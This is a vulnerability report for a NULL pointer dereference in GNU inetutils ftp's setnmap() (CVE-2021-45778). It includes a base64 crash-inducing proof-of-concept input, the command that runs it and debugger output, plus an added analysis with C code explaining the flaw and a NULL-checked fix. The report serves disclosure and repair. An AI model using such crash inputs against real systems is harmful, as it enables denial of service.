CVE-2021-45778: [bug #61723] NULL Pointer Dereference in setnmap() at cmds.c:2303

A NULL pointer dereference in setnmap() at cmds.c of GNU Inetutils v2.2.16-cf091 can lead to a segmentation fault or application crash.


From: AiDai
Subject: [bug #61723] NULL Pointer Dereference in setnmap() at cmds.c:2303
Date: Thu, 23 Dec 2021 09:13:10 -0500 (EST)
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36

URL: https://savannah.gnu.org/bugs/?61723

             Summary: NULL Pointer Dereference in setnmap() at cmds.c:2303
             Project: GNU Networking Utilities
        Submitted by: aidai
        Submitted on: Thu 23 Dec 2021 02:13:08 PM UTC
            Category: None
            Severity: 3 - Normal
          Item Group: None
              Status: None
             Privacy: Public
         Assigned to: None
         Open/Closed: Open
     Discussion Lock: Any

_______________________________________________________

Details:

NULL Pointer Dereference in setnmap() at cmds.c:2303

Description

A NULL Pointer Dereference was discovered in setnmap() at cmds.c:2303. The vulnerability causes a segmentation fault and application crash.

**version**

```
./ftp --version
ftp (GNU inetutils) 2.2.16-cf091
Copyright © 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later https://gnu.org/licenses/gpl.html.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
```

**System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

Proof of Concept

**poc**

```
base64 poc
bm1hIBjyAoHzCcvLArnD/sreCvgmMwoKAPUKEBoKEAAKDgAAAIDn5+fn5wAABADn5+foA+f4FJ0r
CgoKCgoK538Kubn/gAArCgp/CgoKCgoKQn8K1rn/gAAKCgp/CgoKAN0=
```

**command:**

```
./ftp < ./poc
```

**Result**

```
./ftp < ./poc
[1]    728662 segmentation fault  ./ftp < ./poc
```

**gdb**

```
Program received signal SIGSEGV, Segmentation fault.
0x000055555555ec9d in setnmap (argc=3, argv=0x55555557e680 <margv>) at cmds.c:2303
2303      *cp = '\0';
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x5555555702c0 (__libc_csu_init) ◂— endbr64
 RCX  0x4
 RDX  0x0
 RDI  0x555555582aa0 ◂— 0x8102f21820616d6e
 RSI  0x20
 R8   0x555555583620 ◂— 0x8102f21800616d6e /* 'nma' */
 R9   0x7ffff7f5a010 (main_arena+1168) —▸ 0x7ffff7f5a000 (main_arena+1152) —▸ 0x7ffff7f59ff0 (main_arena+1136) —▸ 0x7ffff7f59fe0 (main_arena+1120) —▸ 0x7ffff7f59fd0 (main_arena+1104) ◂— …
 R10  0x555555580010 ◂— 0x0
 R11  0x7ffff7f59be0 (main_arena+96) —▸ 0x5555555851a0 ◂— 0x0
 R12  0x555555559f30 (_start) ◂— endbr64
 R13  0x7fffffffe210 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe060 —▸ 0x7fffffffe0a0 —▸ 0x7fffffffe120 ◂— 0x0
 RSP  0x7fffffffe040 —▸ 0x55555557e680 (margv) —▸ 0x555555583620 ◂— 0x8102f21800616d6e /* 'nma' */
 RIP  0x55555555ec9d (setnmap+258) ◂— mov byte ptr [rax], 0
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x55555555ec9d <setnmap+258>    mov    byte ptr [rax], 0
   0x55555555eca0 <setnmap+261>    mov    rax, qword ptr [rip + 0x1ae49] <0x555555579af0>
   0x55555555eca7 <setnmap+268>    mov    rdi, rax
   0x55555555ecaa <setnmap+271>    call   rpl_free <rpl_free>
   0x55555555ecaf <setnmap+276>    mov    rax, qword ptr [rip + 0x1f98a] <0x55555557e640>
   0x55555555ecb6 <setnmap+283>    mov    rdi, rax
   0x55555555ecb9 <setnmap+286>    call   strdup@plt <strdup@plt>
   0x55555555ecbe <setnmap+291>    mov    qword ptr [rip + 0x1ae2b], rax <0x555555579af0>
   0x55555555ecc5 <setnmap+298>    jmp    setnmap+301 <setnmap+301>
   0x55555555ecc7 <setnmap+300>    nop
   0x55555555ecc8 <setnmap+301>    add    qword ptr [rbp - 8], 1
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/inetutils/inetutils/ftp/cmds.c
   2298       while (*++cp == ' ')
   2299         continue;
   2300       altarg = cp;
   2301       cp = strchr (altarg, ' ');
   2302     }
 ► 2303   *cp = '\0';
   2304
   2305   free (mapin);
   2306   mapin = strdup (altarg);
   2307
   2308   while (*++cp == ' ')
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe040 —▸ 0x55555557e680 (margv) —▸ 0x555555583620 ◂— 0x8102f21800616d6e /* 'nma' */
01:0008│     0x7fffffffe048 ◂— 0x355583620
02:0010│     0x7fffffffe050 —▸ 0x5555555796c0 (cmdtab+2464) ◂— 0x0
03:0018│     0x7fffffffe058 ◂— 0x0
04:0020│ rbp 0x7fffffffe060 —▸ 0x7fffffffe0a0 —▸ 0x7fffffffe120 ◂— 0x0
05:0028│     0x7fffffffe068 —▸ 0x555555566a09 (cmdscanner+633) ◂— mov eax, dword ptr [rip + 0x17bf5]
06:0030│     0x7fffffffe070 ◂— 0x0
07:0038│     0x7fffffffe078 ◂— 0x1c54c7100
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0 0x55555555ec9d setnmap+258
   f 1 0x555555566a09 cmdscanner+633
   f 2 0x55555556665a main+929
   f 3 0x7ffff7d950b3 __libc_start_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  0x000055555555ec9d in setnmap (argc=3, argv=0x55555557e680 <margv>) at cmds.c:2303
#1  0x0000555555566a09 in cmdscanner (top=1) at main.c:461
#2  0x000055555556665a in main (argc=0, argv=0x7fffffffe220) at main.c:310
#3  0x00007ffff7d950b3 in __libc_start_main (main=0x5555555662b9 <main>, argc=1, argv=0x7fffffffe218, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe208) at …/csu/libc-start.c:308
#4  0x0000555555559f5e in _start ()
```

_______________________________________________________

Reply to this item at:

https://savannah.gnu.org/bugs/?61723

_______________________________________________
Message sent via Savannah
https://savannah.gnu.org/
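The report shows the crash but not why `cp` is NULL. Two facts on the page point at it: the gdb frame has `argc=3` while RAX, the register `mov byte ptr [rax], 0` writes through, is `0x0`; and decoding the PoC's base64 gives a first line of `nma ` (a prefix of `nmap`), five non-space bytes, a tab (0x09), eight more bytes and a newline, so the two arguments reach `setnmap()` separated by a tab, not a space, and `strchr (altarg, ' ')` at cmds.c:2301 finds nothing. The C below is an added example, not code from the bug report or from inetutils: it models a tokenizer that splits on space or tab and records `altarg` as the raw text after the command word (assumed to match ftp's behaviour; quoting and backslash handling are left out), reproduces the unchecked `strchr()` result from the non-proxy path without performing the write, and shows a NULL-checked variant (an assumption, not the upstream fix). The `poc_line` bytes are the decoded first line of the PoC; `good_line` and the one-argument line are constructed.

```c
/* Added example (not inetutils code): why setnmap()'s strchr() can return
 * NULL for a three-token command line, and a checked alternative. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAXARGS 8

struct cmdline {
    char argbuf[256];
    char *argv[MAXARGS];
    int argc;
    const char *altarg;   /* start of the second token in the RAW line */
};

/* Model of ftp's makeargv(): tokens split on space OR tab, each copied
 * NUL-terminated into argbuf; altarg remembers where the second token
 * begins inside the unmodified line. (Assumption: simplified tokenizer.) */
static void model_makeargv(struct cmdline *c, const char *line)
{
    const char *sb = line;
    char *ap = c->argbuf;

    c->argc = 0;
    c->altarg = NULL;
    c->argv[0] = NULL;
    if (strlen(line) >= sizeof c->argbuf)   /* argbuf must hold every token */
        return;
    while (c->argc < MAXARGS - 1) {
        while (*sb == ' ' || *sb == '\t')
            sb++;
        if (*sb == '\0' || *sb == '\n')
            break;
        if (c->argc == 1)
            c->altarg = sb;
        c->argv[c->argc++] = ap;
        while (*sb != '\0' && *sb != '\n' && *sb != ' ' && *sb != '\t')
            *ap++ = *sb++;
        *ap++ = '\0';
    }
    c->argv[c->argc] = NULL;
}

/* The original's non-proxy path minus the store:  cp = strchr (altarg, ' ');
 * is followed by  *cp = '\0';  with no check. Returning cp lets a caller
 * observe the NULL instead of faulting on it. */
static const char *vulnerable_split(const char *altarg)
{
    return strchr(altarg, ' ');   /* NULL when the patterns are tab-separated */
}

struct nmap { char *mapin; char *mapout; };

/* Checked variant (assumption, not the upstream fix): accept either separator
 * the tokenizer accepts, refuse when none is present, and copy out of the
 * line instead of writing a NUL into it. Returns 0 on success, -1 otherwise. */
static int setnmap_checked(struct nmap *m, int argc, const char *altarg)
{
    const char *cp, *end;
    size_t inlen, outlen;

    if (argc < 3 || altarg == NULL)
        return -1;
    cp = strpbrk(altarg, " \t");
    if (cp == NULL)                        /* the check cmds.c:2303 lacks */
        return -1;
    inlen = (size_t)(cp - altarg);
    while (*cp == ' ' || *cp == '\t')
        cp++;
    end = cp + strcspn(cp, "\n");          /* mapout keeps the rest of the line */
    outlen = (size_t)(end - cp);
    if (inlen == 0 || outlen == 0)
        return -1;

    free(m->mapin);
    free(m->mapout);
    m->mapin = malloc(inlen + 1);
    m->mapout = malloc(outlen + 1);
    if (m->mapin == NULL || m->mapout == NULL) {
        free(m->mapin);
        free(m->mapout);
        m->mapin = m->mapout = NULL;
        return -1;
    }
    memcpy(m->mapin, altarg, inlen);
    m->mapin[inlen] = '\0';
    memcpy(m->mapout, cp, outlen);
    m->mapout[outlen] = '\0';
    return 0;
}

/* Constructed inputs: the decoded first line of the page's PoC
 * ("nma " + 5 bytes + TAB + 8 bytes + LF) and an ordinary nmap command. */
static const char poc_line[] =
    "nma \x18\xf2\x02\x81\xf3\t\xcb\xcb\x02\xb9\xc3\xfe\xca\xde\n";
static const char good_line[] = "nmap $1.$2 $2.$1\n";

/* Tokenizes one line, reports whether the original's strchr() would have
 * handed *cp a NULL, and returns the checked variant's result. */
static int run_line(const char *line, int *orig_would_crash, struct nmap *m)
{
    struct cmdline c;

    model_makeargv(&c, line);
    *orig_would_crash = (c.argc >= 3 && vulnerable_split(c.altarg) == NULL);
    return setnmap_checked(m, c.argc, c.altarg);
}

int main(void)
{
    struct nmap m = {0};
    int crash;

    printf("poc : checked rc=%d, original would write through NULL: %s\n",
           run_line(poc_line, &crash, &m), crash ? "yes" : "no");
    printf("good: checked rc=%d, original would write through NULL: %s, "
           "mapin=%s mapout=%s\n",
           run_line(good_line, &crash, &m), crash ? "yes" : "no",
           m.mapin, m.mapout);
    free(m.mapin);
    free(m.mapout);
    return 0;
}
```

Run stand-alone, the PoC line tokenizes into three arguments yet yields a NULL from `strchr(altarg, ' ')`, exactly the `argc=3`, `RAX 0x0` state in the gdb frame, while the checked variant parses both lines and rejects a one-argument `nmap`. The general lesson is the one a fuzzer keeps finding in this code base: when a command re-scans the raw line instead of using the already-split `argv`, every separator the tokenizer accepts has to be accepted again, and every `strchr`/`strpbrk` result must be tested before it is dereferenced.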
